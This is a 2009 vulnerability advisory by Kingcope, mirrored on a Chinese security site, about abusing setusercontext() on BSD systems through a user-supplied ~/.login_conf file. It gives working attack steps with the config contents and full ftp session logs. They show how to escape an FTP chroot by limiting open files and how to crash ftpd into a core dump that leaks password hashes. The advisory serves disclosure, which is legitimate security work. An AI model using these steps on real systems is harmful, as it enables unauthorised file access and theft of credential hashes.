首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Various BSD derived operating systems suffer from various vulnerabilities due to
来源:kingcope[at]gmx.net 作者:Kingcope 发布时间:2009-08-24  
*BSD setusercontext vulnerabilites
discovered by Kingcope, July 2009

lewls XD
Let's go..
BSD derived operating systems have a special function to set a "user context".
The function setusercontext() is available on for example FreeBSD 5.0 and 7.0.
An example from ftpd.c :

	setusercontext(lc, pw, (uid_t)0,
		LOGIN_SETLOGIN|LOGIN_SETGROUP|LOGIN_SETPRIORITY|
		LOGIN_SETRESOURCES|LOGIN_SETUMASK);

An interesing setting here is LOGIN_SETRESOURCES with which a USER is allowed
to set resources actually.

From the manpage:

     LOGIN_SETRESOURCES  Set resource limits for the current process based on
			 values specified in the system login class database.
			 Class capability tags used, with and without -cur
			 (soft limit) or -max (hard limit) suffixes and the
			 corresponding resource setting:

			 cputime       RLIMIT_CPU
			 filesize      RLIMIT_FSIZE
			 datasize      RLIMIT_DATA
			 stacksize     RLIMIT_STACK
			 coredumpsize  RLIMIT_CORE
			 memoryuse     RLIMIT_RSS
			 memorylocked  RLIMIT_MEMLOCK
			 maxproc       RLIMIT_NPROC
			 openfiles     RLIMIT_NOFILE
			 sbsize        RLIMIT_SBSIZE
			 vmemoryuse    RLIMIT_VMEM

Now one can set (means: upload) their own ~/.login_conf and play around a bit.
For example the chroot() call in ftpd.c can be bypassed
by setting "openfiles" to a value of 5.
The following example shows:
- User "kcope" is in /etc/ftpchroot and therefore is chrooted in
  his home directory when logging in
- Using the setusercontext() technique we can easily circumvent
  the chroot() call resulting in an access to all files after a login.
- The problem here is now we cannot "ls", "get" or "put" using the ftp
  client. The cause is the open files restriction. All commands which
  do not require opening files are available though including mkdir,
  chmod, rm etc.

Example (the files .login_conf and .login_conf.db are uploaded before
doing this):
---snip---
%cat /etc/ftpchroot
kcope
%cat .login_conf
me:\
  :openfiles=5:

%cap_mkdb .login_conf
%ftp 192.168.2.4
Connected to 192.168.2.4.
220  FTP server (Version 6.00LS) ready.
Name (192.168.2.4:root): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /usr/home/kcope
ftp> mkdir /tmp/foobar
257 "/tmp/foobar" directory created.
ftp> ls
425 Can't open passive connection: Too many open files.
425 Can't open passive connection: Too many open files.
200 PORT command successful.
550 /bin/ls -lgA: Too many open files.
ftp>
---snip---

Another attack involves the option "stacksize" in ~/.login_conf,
which can be used to set the maximum stack size the process may use
after the setusercontext() call.
I am currently researching if the SIGSEGVS in arbitrary locations 
(depended on the stacksize) may be used to execute arbitrary code. It looks promising.

For now there is the really small possiblity that the sysctl setting "kern.sugid_coredump"
is set on the target FreeBSD system to '1' and therefore allows setuid and setgid core dumps.
In the example we use the "STAT" ftp command with openfiles=5 and the ftp will crash creating
a core dump in the kcope home directory which contains for example the master.passwd entries
(of course only when kern.sugid_coredump sysctl setting is set to '1'.)

Example:

# sysctl -a | grep sugid
kern.sugid_coredump: 0
# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
%cat .login_conf
me:\
  :openfiles=5:

%ftp 192.168.2.4
Connected to 192.168.2.4.
220  FTP server (Version 6.00LS) ready.
Name (192.168.2.4:root): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote stat foo
213- Status of foo:
421 Service not available, remote server has closed connection.
ftp> quit
%tail /var/log/messages
...
Jul 29 04:28:46  kernel: pid 3663 (ftpd), uid 1001: exited on signal 11 (core dumped)
%
%ls -la ~/ftpd.core
-rw-------  1 kcope  users  2150400 Jul 29 04:28 /home/kcope/ftpd.core
%strings ftpd.core | grep \$1
$1$2qRDatb.$6.x04oHbLcrSSdHu4Kohg0
$1$2qRDatb.$6.x04oHbLcrSSdHu4Kohg0
$1$2qRDatb.$6.x04oHbLcrSSdHu4Kohg0
$1$fXHQPE4.$Xu6RC2GoZG2j0inNHMS4V/
$1$fXHQPE4.$Xu6RC2GoZG2j0iNNHMS4V/
... (many entries)

(These are of course not my real encrypted passwds XD)
As mentioned before this _might_ be used to execute arbitrary code I am still researching that.

Cheers,

Contact: kcope2@googlemail.com isowarez.de/
Kingcope 



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Discuz自定义模板变量漏洞
·FreeBSD versions 6.1 and below
·Microsoft Scripting Runtime Ac
·Photodex ProShow Gold version
·Linux Kernel 2.x sock_sendpage
·VUPlayer <= 2.49 (.m3u File) U
·Traidnt UP 2.0 Remote SQL Inje
·Radix Antirootkit < 1.0.0.9 (S
·ProSysInfo TFTP Server TFTPDWI
·Linux Kernel 2.4/2.6 sock_send
·KOL Player 1.0 (.mp3 File) Loc
·Ed Charkow's Supercharged Link
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved